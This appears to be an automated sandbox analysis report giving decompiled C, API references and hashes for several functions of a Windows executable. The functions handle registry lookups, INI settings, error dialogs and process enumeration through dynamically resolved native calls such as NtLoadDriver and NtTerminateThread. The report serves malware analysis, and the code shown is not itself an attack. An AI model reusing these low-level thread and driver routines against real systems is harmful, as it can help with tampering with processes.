                                                                                                  • Opcode Fuzzy Hash: 3db2232b312ed916784b241718d450bfb00e2b25eb8021401c0f03919c4bf03b
                                                                                                  • Instruction Fuzzy Hash: 3D119131A40219BFDB21AB65CC86E5A7B25FF04308F00006AFD0477692C739B965DBD9
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 64%
                                                                                                  			E0040467A(void* __edi) {
                                                                                                  				signed int _v8;
                                                                                                  				void* _v12;
                                                                                                  				void* _v16;
                                                                                                  				void _v2062;
                                                                                                  				short _v2064;
                                                                                                  				int _t16;
                                                                                                  
                                                                                                  				_v8 = _v8 & 0x00000000;
                                                                                                  				_t16 = E004043F8( &_v12, 0x20019);
                                                                                                  				if(_t16 == 0) {
                                                                                                  					_v2064 = _v2064 & _t16;
                                                                                                  					memset( &_v2062, _t16, 0x7fe);
                                                                                                  					_push(__edi + 0x20a);
                                                                                                  					_push(L"%s\\shell\\%s");
                                                                                                  					_push(0x3ff);
                                                                                                  					_push( &_v2064);
                                                                                                  					L0040B1EC();
                                                                                                  					if(RegOpenKeyExW(_v12,  &_v2064, 0, 0x20019,  &_v16) == 0) {
                                                                                                  						_v8 = 1;
                                                                                                  						RegCloseKey(_v16);
                                                                                                  					}
                                                                                                  				}
                                                                                                  				return _v8;
                                                                                                  			}









                                                                                                  0x00404683
                                                                                                  0x00404692
                                                                                                  0x00404699
                                                                                                  0x0040469b
                                                                                                  0x004046af
                                                                                                  0x004046ba
                                                                                                  0x004046bc
                                                                                                  0x004046c7
                                                                                                  0x004046cc
                                                                                                  0x004046cd
                                                                                                  0x004046ee
                                                                                                  0x004046f3
                                                                                                  0x004046fa
                                                                                                  0x004046fa
                                                                                                  0x004046ee
                                                                                                  0x00404705

                                                                                                  APIs
                                                                                                  • memset.MSVCRT ref: 004046AF
                                                                                                  • _snwprintf.MSVCRT ref: 004046CD
                                                                                                  • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,?,?,?,?,?,00020019), ref: 004046E6
                                                                                                  • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,00020019), ref: 004046FA
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.282124709.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.282119687.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000003.00000002.282135175.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000003.00000002.282140854.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000003.00000002.282146360.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                  Similarity
                                                                                                  • API ID: CloseOpen_snwprintfmemset
                                                                                                  • String ID: %s\shell\%s
                                                                                                  • API String ID: 1458959524-3196117466
                                                                                                  • Opcode ID: dd937bb9006710e66f977af40412b0b6fd133ebddff1bc1205fab9b1dc2b10fe
                                                                                                  • Instruction ID: 1855bd24da60c853c30f7b3e18bb60aca338c900c60696cbbcdbf1fba26ecf92
                                                                                                  • Opcode Fuzzy Hash: dd937bb9006710e66f977af40412b0b6fd133ebddff1bc1205fab9b1dc2b10fe
                                                                                                  • Instruction Fuzzy Hash: 20011EB5D00218FADB109BD1DD45FDAB7BCEF44314F0041B6AA04F2181EB749B489BA8
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 16%
                                                                                                  			E00409D5F(void* __ecx, wchar_t* __esi, void* __eflags, intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, WCHAR* _a16, long _a20, WCHAR* _a24) {
                                                                                                  				signed short _v131076;
                                                                                                  
                                                                                                  				_t25 = __esi;
                                                                                                  				E0040B550(0x20000, __ecx);
                                                                                                  				if(_a4 == 0) {
                                                                                                  					return GetPrivateProfileStringW(_a8, _a12, _a16, __esi, _a20, _a24);
                                                                                                  				} else {
                                                                                                  					if(__esi == 0 || wcschr(__esi, 0x22) == 0) {
                                                                                                  						_push(_a24);
                                                                                                  					} else {
                                                                                                  						_v131076 = _v131076 & 0x00000000;
                                                                                                  						_push(__esi);
                                                                                                  						_push(L"\"%s\"");
                                                                                                  						_push(0xfffe);
                                                                                                  						_push( &_v131076);
                                                                                                  						L0040B1EC();
                                                                                                  						_push(_a24);
                                                                                                  						_push( &_v131076);
                                                                                                  					}
                                                                                                  					return WritePrivateProfileStringW(_a8, _a12, ??, ??);
                                                                                                  				}
                                                                                                  			}




                                                                                                  0x00409d5f
                                                                                                  0x00409d67
                                                                                                  0x00409d70
                                                                                                  0x00409ddb
                                                                                                  0x00409d72
                                                                                                  0x00409d74
                                                                                                  0x00409db2
                                                                                                  0x00409d84
                                                                                                  0x00409d84
                                                                                                  0x00409d8c
                                                                                                  0x00409d8d
                                                                                                  0x00409d98
                                                                                                  0x00409d9d
                                                                                                  0x00409d9e
                                                                                                  0x00409da6
                                                                                                  0x00409daf
                                                                                                  0x00409daf
                                                                                                  0x00409dc3
                                                                                                  0x00409dc3

                                                                                                  APIs
                                                                                                  • wcschr.MSVCRT ref: 00409D79
                                                                                                  • _snwprintf.MSVCRT ref: 00409D9E
                                                                                                  • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 00409DBC
                                                                                                  • GetPrivateProfileStringW.KERNEL32 ref: 00409DD4
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.282124709.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.282119687.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000003.00000002.282135175.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000003.00000002.282140854.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000003.00000002.282146360.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                  Similarity
                                                                                                  • API ID: PrivateProfileString$Write_snwprintfwcschr
                                                                                                  • String ID: "%s"
                                                                                                  • API String ID: 1343145685-3297466227
                                                                                                  • Opcode ID: ba2a529124e3a207c998afa530794a8b3af16421fe15764eebdae90aacee263b
                                                                                                  • Instruction ID: cff84325bbeeabecfb89bf19508a3778b9d9768fc6139f0f3fcaa17558a1ecc1
                                                                                                  • Opcode Fuzzy Hash: ba2a529124e3a207c998afa530794a8b3af16421fe15764eebdae90aacee263b
                                                                                                  • Instruction Fuzzy Hash: BA018B3244421AFADF219F90DC45FDA3B6AEF04348F008065BA14701E3D739C921DB98
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 38%
                                                                                                  			E004047D2(long __ecx, void* __eflags, struct HWND__* _a4) {
                                                                                                  				char _v2052;
                                                                                                  				short _v4100;
                                                                                                  				void* __edi;
                                                                                                  				long _t15;
                                                                                                  				long _t16;
                                                                                                  
                                                                                                  				_t15 = __ecx;
                                                                                                  				E0040B550(0x1000, __ecx);
                                                                                                  				_t16 = _t15;
                                                                                                  				if(_t16 == 0) {
                                                                                                  					_t16 = GetLastError();
                                                                                                  				}
                                                                                                  				E00404706(_t16,  &_v2052);
                                                                                                  				_push( &_v2052);
                                                                                                  				_push(_t16);
                                                                                                  				_push(L"Error %d: %s");
                                                                                                  				_push(0x400);
                                                                                                  				_push( &_v4100);
                                                                                                  				L0040B1EC();
                                                                                                  				return MessageBoxW(_a4,  &_v4100, L"Error", 0x30);
                                                                                                  			}








                                                                                                  0x004047d2
                                                                                                  0x004047da
                                                                                                  0x004047e0
                                                                                                  0x004047e4
                                                                                                  0x004047ec
                                                                                                  0x004047ec
                                                                                                  0x004047f5
                                                                                                  0x00404800
                                                                                                  0x00404801
                                                                                                  0x00404802
                                                                                                  0x0040480d
                                                                                                  0x00404812
                                                                                                  0x00404813
                                                                                                  0x00404834

                                                                                                  APIs
                                                                                                  • GetLastError.KERNEL32(?,?,004035EB,?,?), ref: 004047E6
                                                                                                  • _snwprintf.MSVCRT ref: 00404813
                                                                                                  • MessageBoxW.USER32(?,?,Error,00000030), ref: 0040482C
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.282124709.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.282119687.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000003.00000002.282135175.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000003.00000002.282140854.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000003.00000002.282146360.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                  Similarity
                                                                                                  • API ID: ErrorLastMessage_snwprintf
                                                                                                  • String ID: Error$Error %d: %s
                                                                                                  • API String ID: 313946961-1552265934
                                                                                                  • Opcode ID: 9fa9ceadd2aea683486b90f32a73d9d70e1e2e007ee85f632c4fe4fcea7526ce
                                                                                                  • Instruction ID: 90e5118ee4f46ea14b6138c5fdcdbe0805ab296af9aaa7bfd3b1d45c15712702
                                                                                                  • Opcode Fuzzy Hash: 9fa9ceadd2aea683486b90f32a73d9d70e1e2e007ee85f632c4fe4fcea7526ce
                                                                                                  • Instruction Fuzzy Hash: 30F08975500208A6C711A795CC46FD572ACEB44785F0401B6B604F31C1DB78AA448A9C
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 90%
                                                                                                  			E004068EC(intOrPtr* __eax, void* __eflags, intOrPtr _a4) {
                                                                                                  				void* _v8;
                                                                                                  				signed int _v12;
                                                                                                  				void* __ebx;
                                                                                                  				void* __ecx;
                                                                                                  				void* __edi;
                                                                                                  				void* __esi;
                                                                                                  				signed int _t74;
                                                                                                  				signed int _t76;
                                                                                                  				signed short _t85;
                                                                                                  				signed int _t87;
                                                                                                  				intOrPtr _t88;
                                                                                                  				signed short _t93;
                                                                                                  				void* _t95;
                                                                                                  				signed int _t124;
                                                                                                  				signed int _t126;
                                                                                                  				signed int _t128;
                                                                                                  				intOrPtr* _t131;
                                                                                                  				signed int _t135;
                                                                                                  				signed int _t137;
                                                                                                  				signed int _t138;
                                                                                                  				void* _t141;
                                                                                                  				void* _t142;
                                                                                                  				void* _t146;
                                                                                                  
                                                                                                  				_t142 = __eflags;
                                                                                                  				_push(_t102);
                                                                                                  				_t131 = __eax;
                                                                                                  				 *((intOrPtr*)(__eax + 4)) =  *((intOrPtr*)( *__eax + 0x68))();
                                                                                                  				E00406746(__eax);
                                                                                                  				 *(_t131 + 0x38) =  *(_t131 + 0x38) & 0x00000000;
                                                                                                  				_t135 = 5;
                                                                                                  				 *((intOrPtr*)(_t131 + 0x2a0)) = _a4;
                                                                                                  				_t124 = 0x14;
                                                                                                  				_t74 = _t135 * _t124;
                                                                                                  				 *(_t131 + 0x2d0) = _t135;
                                                                                                  				_push( ~(0 | _t142 > 0x00000000) | _t74);
                                                                                                  				L0040B26C();
                                                                                                  				 *(_t131 + 0x2d4) = _t74;
                                                                                                  				_t126 = 0x14;
                                                                                                  				_t76 = _t135 * _t126;
                                                                                                  				_push( ~(0 | _t142 > 0x00000000) | _t76);
                                                                                                  				L0040B26C();
                                                                                                  				_t95 = 0x40f008;
                                                                                                  				 *(_t131 + 0x40) = _t76;
                                                                                                  				_v8 = 0x40f008;
                                                                                                  				do {
                                                                                                  					_t137 =  *_t95 * 0x14;
                                                                                                  					memcpy( *(_t131 + 0x2d4) + _t137, _t95, 0x14);
                                                                                                  					_t24 = _t95 + 0x14; // 0x40f01c
                                                                                                  					memcpy( *(_t131 + 0x40) + _t137, _t24, 0x14);
                                                                                                  					_t85 =  *( *(_t131 + 0x2d4) + _t137 + 0x10);
                                                                                                  					_t141 = _t141 + 0x18;
                                                                                                  					_v12 = _t85;
                                                                                                  					 *( *(_t131 + 0x40) + _t137 + 0x10) = _t85;
                                                                                                  					if((_t85 & 0xffff0000) == 0) {
                                                                                                  						 *( *(_t131 + 0x2d4) + _t137 + 0x10) = E00405B81(_t85 & 0x0000ffff);
                                                                                                  						_t93 = E00405B81(_v12 | 0x00010000);
                                                                                                  						_t95 = _v8;
                                                                                                  						 *( *(_t131 + 0x40) + _t137 + 0x10) = _t93;
                                                                                                  					}
                                                                                                  					_t95 = _t95 + 0x28;
                                                                                                  					_t146 = _t95 - 0x40f0d0;
                                                                                                  					_v8 = _t95;
                                                                                                  				} while (_t146 < 0);
                                                                                                  				 *(_t131 + 0x44) =  *(_t131 + 0x44) & 0x00000000;
                                                                                                  				_t138 = 5;
                                                                                                  				_t128 = 4;
                                                                                                  				_t87 = _t138 * _t128;
                                                                                                  				 *((intOrPtr*)(_t131 + 0x48)) = 1;
                                                                                                  				 *(_t131 + 0x2c) = _t138;
                                                                                                  				 *((intOrPtr*)(_t131 + 0x28)) = 0x20;
                                                                                                  				_push( ~(0 | _t146 > 0x00000000) | _t87);
                                                                                                  				L0040B26C();
                                                                                                  				_push(0xc);
                                                                                                  				 *(_t131 + 0x30) = _t87;
                                                                                                  				L0040B26C();
                                                                                                  				_t139 = _t87;
                                                                                                  				if(_t87 == 0) {
                                                                                                  					_t88 = 0;
                                                                                                  					__eflags = 0;
                                                                                                  				} else {
                                                                                                  					_t88 = E00406607(_a4,  *((intOrPtr*)(_t131 + 0x58)), _t139);
                                                                                                  				}
                                                                                                  				 *((intOrPtr*)(_t131 + 0x2c0)) = _t88;
                                                                                                  				 *((intOrPtr*)(_t131 + 0x4c)) = 1;
                                                                                                  				 *((intOrPtr*)(_t131 + 0x50)) = 0;
                                                                                                  				 *((intOrPtr*)(_t131 + 0x2b4)) = 1;
                                                                                                  				 *((intOrPtr*)(_t131 + 0x2b8)) = 0;
                                                                                                  				 *((intOrPtr*)(_t131 + 0x2bc)) = 0;
                                                                                                  				 *((intOrPtr*)(_t131 + 0x2c4)) = 1;
                                                                                                  				 *((intOrPtr*)(_t131 + 0x2c8)) = 1;
                                                                                                  				 *((intOrPtr*)(_t131 + 0x334)) = 0x32;
                                                                                                  				 *((intOrPtr*)(_t131 + 0x5c)) = 0xffffff;
                                                                                                  				return E0040686C(_t131);
                                                                                                  			}


























                                                                                                  0x004068ec
                                                                                                  0x004068f0
                                                                                                  0x004068f4
                                                                                                  0x004068ff
                                                                                                  0x00406902
                                                                                                  0x0040690a
                                                                                                  0x00406910
                                                                                                  0x00406911
                                                                                                  0x0040691b
                                                                                                  0x0040691e
                                                                                                  0x00406923
                                                                                                  0x0040692d
                                                                                                  0x0040692e
                                                                                                  0x00406933
                                                                                                  0x0040693d
                                                                                                  0x00406940
                                                                                                  0x00406949
                                                                                                  0x0040694a
                                                                                                  0x00406950
                                                                                                  0x00406956
                                                                                                  0x00406959
                                                                                                  0x0040695c
                                                                                                  0x00406964
                                                                                                  0x0040696d
                                                                                                  0x00406974
                                                                                                  0x0040697e
                                                                                                  0x00406989
                                                                                                  0x00406990
                                                                                                  0x00406998
                                                                                                  0x0040699b
                                                                                                  0x0040699f
                                                                                                  0x004069b8
                                                                                                  0x004069bc
                                                                                                  0x004069c4
                                                                                                  0x004069c7
                                                                                                  0x004069c7
                                                                                                  0x004069cb
                                                                                                  0x004069ce
                                                                                                  0x004069d4
                                                                                                  0x004069d4
                                                                                                  0x004069d9
                                                                                                  0x004069df
                                                                                                  0x004069e6
                                                                                                  0x004069ea
                                                                                                  0x004069ef
                                                                                                  0x004069f2
                                                                                                  0x004069f5
                                                                                                  0x00406a00
                                                                                                  0x00406a01
                                                                                                  0x00406a06
                                                                                                  0x00406a08
                                                                                                  0x00406a0b
                                                                                                  0x00406a10
                                                                                                  0x00406a16
                                                                                                  0x00406a25
                                                                                                  0x00406a25
                                                                                                  0x00406a18
                                                                                                  0x00406a1e
                                                                                                  0x00406a1e
                                                                                                  0x00406a27
                                                                                                  0x00406a2f
                                                                                                  0x00406a32
                                                                                                  0x00406a35
                                                                                                  0x00406a3b
                                                                                                  0x00406a41
                                                                                                  0x00406a47
                                                                                                  0x00406a4d
                                                                                                  0x00406a53
                                                                                                  0x00406a5d
                                                                                                  0x00406a6d

                                                                                                  APIs
                                                                                                    • Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406752
                                                                                                    • Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406760
                                                                                                    • Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406771
                                                                                                    • Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406788
                                                                                                    • Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406791
                                                                                                  • ??2@YAPAXI@Z.MSVCRT ref: 0040692E
                                                                                                  • ??2@YAPAXI@Z.MSVCRT ref: 0040694A
                                                                                                  • memcpy.MSVCRT ref: 0040696D
                                                                                                  • memcpy.MSVCRT ref: 0040697E
                                                                                                  • ??2@YAPAXI@Z.MSVCRT ref: 00406A01
                                                                                                  • ??2@YAPAXI@Z.MSVCRT ref: 00406A0B
                                                                                                    • Part of subcall function 00405B81: GetModuleHandleW.KERNEL32(00000000,?,?,00403490), ref: 00405BC0
                                                                                                    • Part of subcall function 00405B81: LoadStringW.USER32(00000000,000001F5,?), ref: 00405C59
                                                                                                    • Part of subcall function 00405B81: memcpy.MSVCRT ref: 00405C99
                                                                                                    • Part of subcall function 00405B81: wcscpy.MSVCRT ref: 00405C02
                                                                                                    • Part of subcall function 00405B81: wcslen.MSVCRT ref: 00405C20
                                                                                                    • Part of subcall function 00405B81: GetModuleHandleW.KERNEL32(00000000,?,?,?,00403490), ref: 00405C2E
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.282124709.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.282119687.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000003.00000002.282135175.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000003.00000002.282140854.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000003.00000002.282146360.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                  Similarity
                                                                                                  • API ID: ??3@$??2@$memcpy$HandleModule$LoadStringwcscpywcslen
                                                                                                  • String ID:
                                                                                                  • API String ID: 975042529-0
                                                                                                  • Opcode ID: 7b5c259927b59544c1da32c87fb64e8a434fc950baf11122839f6010e947eddb
                                                                                                  • Instruction ID: 1f3882e7c97b8b8272a376ef7761bc0b0e9511dafd47f947fc31f4e13e233f39
                                                                                                  • Opcode Fuzzy Hash: 7b5c259927b59544c1da32c87fb64e8a434fc950baf11122839f6010e947eddb
                                                                                                  • Instruction Fuzzy Hash: 53414EB1B01715AFD718DF39C88A75AFBA4FB08314F10422FE519D7691D775A8108BC8
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 83%
                                                                                                  			E004097A9(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4) {
                                                                                                  				int _v8;
                                                                                                  				int _v12;
                                                                                                  				intOrPtr _v16;
                                                                                                  				void* _v20;
                                                                                                  				int _v24;
                                                                                                  				void _v56;
                                                                                                  				char _v584;
                                                                                                  				char _v588;
                                                                                                  				char _v41548;
                                                                                                  				void* __edi;
                                                                                                  				void* _t40;
                                                                                                  				void _t46;
                                                                                                  				intOrPtr _t47;
                                                                                                  				intOrPtr* _t64;
                                                                                                  				intOrPtr* _t66;
                                                                                                  				intOrPtr _t67;
                                                                                                  				intOrPtr _t71;
                                                                                                  				int _t77;
                                                                                                  				void* _t80;
                                                                                                  				void* _t81;
                                                                                                  				void* _t82;
                                                                                                  				void* _t83;
                                                                                                  
                                                                                                  				E0040B550(0xa248, __ecx);
                                                                                                  				_t77 = 0;
                                                                                                  				_v8 = 0;
                                                                                                  				E00408E31();
                                                                                                  				_t40 =  *0x41c47c;
                                                                                                  				if(_t40 != 0) {
                                                                                                  					_t40 =  *_t40(5,  &_v41548, 0xa000,  &_v8);
                                                                                                  				}
                                                                                                  				if(_v8 == _t77) {
                                                                                                  					_v8 = 0x186a0;
                                                                                                  				}
                                                                                                  				_v8 = _v8 + 0x3e80;
                                                                                                  				_push(_v8);
                                                                                                  				L0040B26C();
                                                                                                  				_t81 = _t40;
                                                                                                  				_v20 = _t81;
                                                                                                  				memset(_t81, _t77, _v8);
                                                                                                  				_t83 = _t82 + 0x10;
                                                                                                  				_v24 = _t77;
                                                                                                  				E00408E31();
                                                                                                  				E00408F2A(0x41c47c, _t81, _v8,  &_v24);
                                                                                                  				L5:
                                                                                                  				while(1) {
                                                                                                  					if( *((intOrPtr*)(_t81 + 0x3c)) == _t77) {
                                                                                                  						L16:
                                                                                                  						_t46 =  *_t81;
                                                                                                  						_t77 = 0;
                                                                                                  						if(_t46 == 0) {
                                                                                                  							_push(_v20);
                                                                                                  							L0040B272();
                                                                                                  							return _t46;
                                                                                                  						}
                                                                                                  						_t81 = _t81 + _t46;
                                                                                                  						continue;
                                                                                                  					}
                                                                                                  					_t47 = _a4;
                                                                                                  					_t71 =  *((intOrPtr*)(_t47 + 0x34));
                                                                                                  					_v12 = _t77;
                                                                                                  					_v16 = _t71;
                                                                                                  					if(_t71 <= _t77) {
                                                                                                  						L10:
                                                                                                  						_t66 = 0;
                                                                                                  						L11:
                                                                                                  						if(_t66 == 0) {
                                                                                                  							E004090AF( &_v588);
                                                                                                  							E00404923(0x104,  &_v584,  *((intOrPtr*)(_t81 + 0x3c)));
                                                                                                  							_t32 = _t81 + 0x20; // 0x20
                                                                                                  							memcpy( &_v56, _t32, 8);
                                                                                                  							_t83 = _t83 + 0x10;
                                                                                                  							E004099ED(_a4 + 0x28,  &_v588);
                                                                                                  						} else {
                                                                                                  							_t26 = _t66 + 4; // 0x4
                                                                                                  							_t72 = _t26;
                                                                                                  							if( *_t26 == 0) {
                                                                                                  								E00404923(0x104, _t72,  *((intOrPtr*)(_t81 + 0x3c)));
                                                                                                  								_t28 = _t81 + 0x20; // 0x20
                                                                                                  								memcpy(_t66 + 0x214, _t28, 8);
                                                                                                  								_t83 = _t83 + 0x10;
                                                                                                  							}
                                                                                                  						}
                                                                                                  						goto L16;
                                                                                                  					}
                                                                                                  					_t67 =  *((intOrPtr*)(_t81 + 0x44));
                                                                                                  					_t80 = _t47 + 0x28;
                                                                                                  					while(1) {
                                                                                                  						_t64 = E00405A92(_v12, _t80);
                                                                                                  						if( *_t64 == _t67) {
                                                                                                  							break;
                                                                                                  						}
                                                                                                  						_v12 = _v12 + 1;
                                                                                                  						if(_v12 < _v16) {
                                                                                                  							continue;
                                                                                                  						}
                                                                                                  						goto L10;
                                                                                                  					}
                                                                                                  					_t66 = _t64;
                                                                                                  					goto L11;
                                                                                                  				}
                                                                                                  			}

























                                                                                                  0x004097b1
                                                                                                  0x004097b9
                                                                                                  0x004097bb
                                                                                                  0x004097be
                                                                                                  0x004097c3
                                                                                                  0x004097ca
                                                                                                  0x004097de
                                                                                                  0x004097de
                                                                                                  0x004097e3
                                                                                                  0x004097e5
                                                                                                  0x004097e5
                                                                                                  0x004097ec
                                                                                                  0x004097f3
                                                                                                  0x004097f6
                                                                                                  0x004097fe
                                                                                                  0x00409802
                                                                                                  0x00409805
                                                                                                  0x0040980a
                                                                                                  0x0040980d
                                                                                                  0x00409810
                                                                                                  0x00409822
                                                                                                  0x00000000
                                                                                                  0x00409827
                                                                                                  0x0040982a
                                                                                                  0x004098da
                                                                                                  0x004098da
                                                                                                  0x004098dc
                                                                                                  0x004098e0
                                                                                                  0x004098e9
                                                                                                  0x004098ec
                                                                                                  0x004098f6
                                                                                                  0x004098f6
                                                                                                  0x004098e2
                                                                                                  0x00000000
                                                                                                  0x004098e2
                                                                                                  0x00409830
                                                                                                  0x00409833
                                                                                                  0x00409838
                                                                                                  0x0040983b
                                                                                                  0x0040983e
                                                                                                  0x0040985f
                                                                                                  0x0040985f
                                                                                                  0x00409861
                                                                                                  0x00409863
                                                                                                  0x0040989e
                                                                                                  0x004098b1
                                                                                                  0x004098b8
                                                                                                  0x004098c0
                                                                                                  0x004098c5
                                                                                                  0x004098d5
                                                                                                  0x00409865
                                                                                                  0x00409865
                                                                                                  0x00409865
                                                                                                  0x0040986c
                                                                                                  0x00409878
                                                                                                  0x0040987f
                                                                                                  0x0040988a
                                                                                                  0x0040988f
                                                                                                  0x0040988f
                                                                                                  0x0040986c
                                                                                                  0x00000000
                                                                                                  0x00409863
                                                                                                  0x00409840
                                                                                                  0x00409843
                                                                                                  0x00409846
                                                                                                  0x0040984b
                                                                                                  0x00409852
                                                                                                  0x00000000
                                                                                                  0x00000000
                                                                                                  0x00409854
                                                                                                  0x0040985d
                                                                                                  0x00000000
                                                                                                  0x00000000
                                                                                                  0x00000000
                                                                                                  0x0040985d
                                                                                                  0x00409894
                                                                                                  0x00000000
                                                                                                  0x00409894

                                                                                                  APIs
                                                                                                    • Part of subcall function 00408E31: GetModuleHandleW.KERNEL32(ntdll.dll,?,004097C3), ref: 00408E44
                                                                                                    • Part of subcall function 00408E31: GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00408E5B
                                                                                                    • Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtLoadDriver), ref: 00408E6D
                                                                                                    • Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtUnloadDriver), ref: 00408E7F
                                                                                                    • Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 00408E91
                                                                                                    • Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 00408EA3
                                                                                                    • Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtQueryObject), ref: 00408EB5
                                                                                                    • Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtOpenThread), ref: 00408EC7
                                                                                                    • Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtClose), ref: 00408ED9
                                                                                                    • Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtQueryInformationThread), ref: 00408EEB
                                                                                                    • Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtSuspendThread), ref: 00408EFD
                                                                                                    • Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtResumeThread), ref: 00408F0F
                                                                                                    • Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtTerminateThread), ref: 00408F21
                                                                                                  • ??2@YAPAXI@Z.MSVCRT ref: 004097F6
                                                                                                  • memset.MSVCRT ref: 00409805
                                                                                                  • memcpy.MSVCRT ref: 0040988A
                                                                                                  • memcpy.MSVCRT ref: 004098C0
                                                                                                  • ??3@YAXPAX@Z.MSVCRT ref: 004098EC
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.282124709.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.282119687.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000003.00000002.282135175.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000003.00000002.282140854.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000003.00000002.282146360.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                  Similarity
                                                                                                  • API ID: AddressProc$memcpy$??2@??3@HandleModulememset
                                                                                                  • String ID:
                                                                                                  • API String ID: 3641025914-0
                                                                                                  • Opcode ID: 5e4299bbf46472c45a4c6d50f6a05ce4ddc252402b4fb65f630eed7603d777c4
                                                                                                  • Instruction ID: bb54f3dbfe595cb11ae02f9551d523dabe65b88657fa4b418f7fa82d5da08bd9
                                                                                                  • Opcode Fuzzy Hash: 5e4299bbf46472c45a4c6d50f6a05ce4ddc252402b4fb65f630eed7603d777c4
                                                                                                  • Instruction Fuzzy Hash: BF41C172900209EFDB10EBA5C8819AEB3B9EF45304F14847FE545B3292DB78AE41CB59
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 68%
                                                                                                  			E004067AC(char** __edi) {
                                                                                                  				void* __esi;
                                                                                                  				void* _t9;
                                                                                                  				void** _t11;
                                                                                                  				char** _t15;
                                                                                                  				char** _t24;
                                                                                                  				void* _t25;
                                                                                                  				char* _t28;
                                                                                                  				char* _t29;
                                                                                                  				char* _t30;
                                                                                                  				char* _t31;
                                                                                                  				char** _t33;
                                                                                                  
                                                                                                  				_t24 = __edi;
                                                                                                  				 *__edi = "cf@";
                                                                                                  				_t9 = E00406746(__edi);
                                                                                                  				_t28 = __edi[5];
                                                                                                  				if(_t28 != 0) {
                                                                                                  					_t9 = E004055D1(_t9, _t28);
                                                                                                  					_push(_t28);
                                                                                                  					L0040B272();
                                                                                                  				}
                                                                                                  				_t29 = _t24[4];
                                                                                                  				if(_t29 != 0) {
                                                                                                  					_t9 = E004055D1(_t9, _t29);
                                                                                                  					_push(_t29);
                                                                                                  					L0040B272();
                                                                                                  				}
                                                                                                  				_t30 = _t24[3];
                                                                                                  				if(_t30 != 0) {
                                                                                                  					_t9 = E004055D1(_t9, _t30);
                                                                                                  					_push(_t30);
                                                                                                  					L0040B272();
                                                                                                  				}
                                                                                                  				_t31 = _t24[2];
                                                                                                  				if(_t31 != 0) {
                                                                                                  					E004055D1(_t9, _t31);
                                                                                                  					_push(_t31);
                                                                                                  					L0040B272();
                                                                                                  				}
                                                                                                  				_t15 = _t24;
                                                                                                  				_pop(_t32);
                                                                                                  				_push(_t24);
                                                                                                  				_t33 = _t15;
                                                                                                  				_t25 = 0;
                                                                                                  				if(_t33[1] > 0 && _t33[0xd] > 0) {
                                                                                                  					do {
